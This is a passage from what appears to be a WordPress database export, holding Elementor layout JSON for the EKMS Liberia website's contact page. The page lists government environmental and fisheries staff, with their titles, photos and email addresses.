href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23243,3370,'_elementor_edit_mode','builder'),(23244,3370,'_elementor_template_type','wp-page'),(23245,3370,'_elementor_version','3.0.16'),(23246,3370,'_wp_page_template','default'),(23247,3370,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a 